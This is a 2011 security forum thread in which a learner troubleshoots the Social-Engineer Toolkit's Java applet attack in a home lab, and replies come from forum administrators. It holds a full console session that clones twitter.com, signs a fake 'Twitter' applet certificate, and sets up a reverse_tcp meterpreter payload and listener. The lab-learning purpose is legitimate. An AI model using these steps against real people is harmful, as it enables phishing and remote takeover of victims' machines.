Thread: SET & Windows 7

  1. #1
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    13

    Default SET & Windows 7

    I am running BT 5 and Windows 7 (x64), not patched, in a VM, and the two have bridged adapters set up. I am learning SET and I am trying to use the Java applet attack vector. Java is installed, the firewall is off and there is no AV in Windows 7. I was wondering which payload I should use? I would like to have a meterpreter session, so I chose the "windows/x64/meterpreter/reverse_tcp" and then later the "windows/x64/meterpreter/bind_tcp" payloads, without success.
    I am using IE8 and Mozilla Firefox 8. When I click on the IP address, the page keeps reloading. And is it possible to use a URL instead of the IP address?

    Below the MSF output received :

    Code:
    [*] Processing src/program_junk/meta_config for ERB directives.
    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
    PAYLOAD => windows/x64/meterpreter/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
    LHOST => 0.0.0.0
    resource (src/program_junk/meta_config)> set LPORT 443
    LPORT => 443
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j
    [*] Exploit running as background job.
    msf  exploit(handler) >
    [*] Started reverse handler on 0.0.0.0:443
    [*] Starting the payload handler...

    Thanks for the assistance

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET & Windows 7

    Do you have java installed on your Win7 ?
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Just burned his ISO
    Join Date
    Jun 2011
    Posts
    7

    Default Re: SET & Windows 7

    It seems like your Windows 7 VM does not have Java installed. When you try the Java Applet attack on a machine without Java you get a bootloop (where the page reloads endlessly). So make sure Java is installed, and if you still have the same trouble after the Java install, update SET to the latest version. There were some changes made to SET that should clear up the problem.

    Hope this helps man.
    Last edited by sickness; 11-26-2011 at 07:55 PM. Reason: Leave that part out.

  4. #4
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    13

    Default Re: SET & Windows 7

    As mentioned in the post, Java is installed in Win7; here is the result from cmd:
    Code:
    C:\Users\student1>java -version
    java version "1.6.0_29"
    Java(TM) SE Runtime Environment (build 1.6.0_29-b11)
    Java HotSpot(TM) 64-Bit Server VM (build 20.4-b02, mixed mode)

    Maybe you would recommend another method to check Java?

    And the SET version is 2.4.2. I tried again and I am still having a bootloop.

    Thanks for the assistance

  5. #5
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET & Windows 7

    Have you updated SET to its latest version? Also, could you provide all your konsole commands?

  6. #6
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    13

    Default Re: SET & Windows 7

    I have updated SET and even Metasploit. The SET version is 2.4.2 and the codename is 'Renegade'. I have tried different payloads for x64 and nothing. Below are the console commands:

    Code:
     
     
       Select from the menu:
    
       1) Spear-Phishing Attack Vectors
       2) Website Attack Vectors
       3) Infectious Media Generator
       4) Create a Payload and Listener
       5) Mass Mailer Attack
       6) Arduino-Based Attack Vector
       7) SMS Spoofing Attack Vector
       8) Wireless Access Point Attack Vector
       9) Third Party Modules
    
      99) Return back to the main menu.
    
    set> 2
    
     The Web Attack module is  a unique way of utilizing multiple web-based attacks
     in order to compromise the intended victim.
    
     The Java Applet Attack method will spoof a Java Certificate and deliver a 
     metasploit based payload. Uses a customized java applet created by Thomas
     Werth to deliver the payload.
    
     
    
       1) Java Applet Attack Method
       2) Metasploit Browser Exploit Method
       3) Credential Harvester Attack Method
       4) Tabnabbing Attack Method
       5) Man Left in the Middle Attack Method
       6) Web Jacking Attack Method
       7) Multi-Attack Web Method
       8) Victim Web Profiler
       9) Create or import a CodeSigning Certificate
    
      99) Return to Main Menu
    
    set:webattack>1
    
     The first method will allow SET to import a list of pre-defined web 
     applications that it can utilize within the attack.
    
     The second method will completely clone a website of your choosing
     and allow you to utilize the attack vectors within the completely
     same web application you were attempting to clone.
    
     The third method allows you to import your own website, note that you
     should only have an index.html when using the import website
     functionality.
       
       1) Web Templates
       2) Site Cloner
       3) Custom Import
    
      99) Return to Webattack Menu
    
    set:webattack>2
    [-] NAT/Port Forwarding can be used in the cases where your SET machine is
    [-] not externally exposed and may be a different IP address than your reverse listener.
    set> Are you using NAT/Port Forwarding [yes|no]: no
    [-] Enter the IP address of your interface IP or if your using an external IP, what
    [-] will be used for the connection back and to house the web server (your interface address)
    set:webattack> IP address for the reverse connection:192.168.1.106
    
     Simply enter in the required fields, easy example below:
    
     Name: FakeCompany
     Organization: Fake Company
     Organization Name: Fake Company
     City: Cleveland
     State: Ohio
     Country: US
     Is this correct: yes
    
    [!] *** WARNING ***
    [!] IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk
    [!] *** WARNING ***
    What is your first and last name?
      [Unknown]:  Twitter
    What is the name of your organizational unit?
      [Unknown]:  Twitter
    What is the name of your organization?
      [Unknown]:  Twitter
    What is the name of your City or Locality?
      [Unknown]:  Auckland
    What is the name of your State or Province?
      [Unknown]:  CA
    What is the two-letter country code for this unit?
      [Unknown]:  US
    Is CN=Twitter, OU=Twitter, O=Twitter, L=Auckland, ST=CA, C=US correct?
      [no]:  yes
    
    
    Warning: 
    The signer certificate will expire within six months.
    [*] Java Applet is now signed and will be imported into the website
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:http://www.twitter.com
    [*] Cloning the website: http://www.twitter.com
    [*] This could take a little bit...
    [*] Injecting Java Applet attack into the newly cloned website.
    [*] Filename obfuscation complete. Payload name is: Iwspj6
    [*] Malicious java applet website prepped for deployment
    
    
    What payload do you want to generate:
    
      Name:                                       Description:
    
       1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
       2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
       3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
       4) Windows Bind Shell                      Execute payload and create an accepting port on remote system
       5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
       6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
       7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
       8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
       9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
      10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
      11) SE Toolkit Interactive Shell            New custom interactive reverse shell designed for SET
      12) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
      13) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)
      14) Import your own executable              Specify a path for your own executable
    
    set:payloads>7
    set:payloads> PORT of the listener [443]:443
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/x64/meterpreter/reverse_tcp
     Length: 422
    Options: {"LHOST"=>"192.168.1.106", "LPORT"=>"443"}
    [*] Generating x64-based powershell injection code...
    [*] Generating x86-based powershell injection code...
    [*] Printing the x64 based encoded code...
    I erased it because it was triggering a security alert
    [*] Finished generating shellcode powershell injection attack and is encoded to bypass excution restriction policys...
    [*] Generating OSX payloads through Metasploit...
    [*] Generating Linux payloads through Metasploit...
    [*] Apache appears to be running, moving files into Apache's home
    
    ***************************************************
    Web Server Launched. Welcome to the SET Web Attack.
    ***************************************************
    
    [--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
    [--] Apache web server is currently in use for performance. [--]
    [-] Launching MSF Listener...
    [-] This may take a few to load MSF...
    [-] ***
    [-] * WARNING: Database support has been disabled
    [-] ***
    
                              ########                  #
                          #################            #
                       ######################         #
                      #########################      #
                    ############################
                   ##############################
                   ###############################
                  ###############################
                  ##############################
                                  #    ########   #
                     ##        ###        ####   ##
                                          ###   ###
                                        ####   ###
                   ####          ##########   ####
                   #######################   ####
                     ####################   ####
                      ##################  ####
                        ############      ##
                           ########        ###
                          #########        #####
                        ############      ######
                       ########      #########
                         #####       ########
                           ###       #########
                          ######    ############
                         #######################
                         #   #   ###  #   #   ##
                         ########################
                          ##     ##   ##     ##
    
    
    
           =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
    + -- --=[ 767 exploits - 405 auxiliary - 119 post
    + -- --=[ 228 payloads - 27 encoders - 8 nops
           =[ svn r14325 updated yesterday (2011.11.30)
    [*] Processing src/program_junk/meta_config for ERB directives.
    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
    PAYLOAD => windows/x64/meterpreter/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
    LHOST => 0.0.0.0
    resource (src/program_junk/meta_config)> set LPORT 443
    LPORT => 443
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j
    [*] Exploit running as background job.
    msf  exploit(handler) >
    [*] Started reverse handler on 0.0.0.0:443
    [*] Starting the payload handler...

    I sent an email directly from a Gmail account to another one; that is why you do not see any email.
    Thanks for the assistance

    Edit:

    Hi everybody,

    I was able to solve my problem. I think the problem was with the payload I was using before, the "Windows Meterpreter Reverse_TCP X64". Instead of that I used the "Windows Reverse_TCP Meterpreter" and it worked.

    So I am glad it worked, but it raises a new question: why did the payload designed for the x64 architecture not work while the x86 one did?

    Thanks
    Last edited by sickness; 12-03-2011 at 08:41 PM.

  7. #7
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SET & Windows 7

    I might be wrong, but from what I remember Java doesn't have an x64 version.
